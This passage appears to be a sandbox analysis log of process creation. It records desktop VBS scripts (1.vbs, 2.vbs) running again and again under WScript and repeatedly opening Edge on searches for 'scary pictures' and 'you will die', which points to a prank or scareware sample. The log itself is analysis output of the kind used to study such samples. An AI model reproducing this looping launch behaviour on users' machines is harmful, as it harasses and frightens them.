C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,16343673021933275120,8903920067546153527,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
4⤵
PID:22512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:20856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1472,9738006876452915672,16614872047677015950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
4⤵
PID:12448

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:20940

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:20952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:20992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:21016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,116128711232892192,3599282644162717252,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
4⤵
PID:23416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:21148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:21224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,13573112166046332214,6014232724045873968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
4⤵
PID:22564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:21196

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:13236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:20076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,6028396711800329445,12982671919338743486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
4⤵
PID:23436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:20252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,7044419724756019810,13582108216836291903,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
4⤵
PID:22548

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:19192

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:12160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:6788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,12554877365013433840,16276342282687815514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
4⤵
PID:1896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:20540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,18088882221797160218,6916716479475321663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1536 /prefetch:3
4⤵
PID:21856

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:20600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:9248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:8568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:8580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,4630695224626507177,6277471320774764660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
4⤵
PID:23184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:9300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:8544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,14800282642832061960,4169052180826819786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
4⤵
PID:22620

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:15924

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:4168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:21104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:2360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,16851082966948367186,2984747129024677359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
4⤵
PID:5016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:20976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:7076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,17614390401343497506,8457947803170196455,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
4⤵
PID:23724

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:3316

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:1628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:21308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:21356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16824583587833906577,5318793058234630364,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
4⤵
PID:23644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:21328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:15808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,14885387343615344225,6472434791566173500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
4⤵
PID:22584

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:21456

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:6168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:15104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:15112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,16522522157586677703,4381237268541769586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
4⤵
PID:22556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:15204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:14832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2
4⤵
PID:9020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 /prefetch:3
4⤵
PID:9032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
4⤵
PID:25288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
4⤵
PID:23188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
4⤵
PID:21524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
4⤵
PID:25568

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,13688328454745844296,5729841304260515754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4388 /prefetch:8
4⤵
PID:22868

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:6460

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:15860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:12532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:12300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,3354598693995413193,4049222275473377807,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
4⤵
PID:22264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:12484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:12876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,6710187023837474302,6052307890605240684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
4⤵
PID:22460

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:21904

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:23144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
